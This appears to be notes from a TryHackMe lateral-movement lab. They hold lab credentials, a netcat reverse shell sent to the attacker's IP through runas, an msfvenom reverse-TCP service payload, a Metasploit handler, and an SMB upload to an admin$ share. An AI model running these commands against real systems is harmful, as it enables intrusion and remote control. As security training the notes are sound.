Lateral Movement and Pivoting

Environment Preparation

cat /etc/hosts
#TryHackMe
10.200.74.101   THMDC.za.tryhackme.com
10.200.74.201   THMIIS.za.tryhackme.com distributor.za.tryhackme.com
10.200.74.249   THMJMP2.za.tryhackme.com 

#Local Seting
127.0.0.1       localhost
127.0.1.1       kali

Get credentials

http://distributor.za.tryhackme.com/creds

 Username: barbara.taylor 
 Password: Knockers2015?
 
 User: ZA.TRYHACKME.COM\\t1_leonard.summers

Password: EZpass4ever

SSH connect

ssh [email protected]

Set listener 4443 on Kali

nc -lvnp 4443

Get a reverse shell from ssh to Impersonation Leonard

runas /netonly /user:ZA.TRYHACKME.COM\\t1_leonard.summers "c:\\tools\\nc64.exe -e cmd.exe 10.150.74.17 4443"

Create a payload on kali machine

msfvenom -p windows/shell/reverse_tcp -f exe-service LHOST=10.150.74.17 LPORT=4444 -o georgel.exe

Set listener on msf

msfconsole -q -x "use exploit/multi/handler; set payload windows/shell/reverse_tcp; set LHOST lateralmovement; set LPORT 4444;exploit"

Transfer payload

smbclient -c 'put georgel.exe' -U t1_leonard.summers -W ZA '//thmiis.za.tryhackme.com/admin$/' EZpass4ever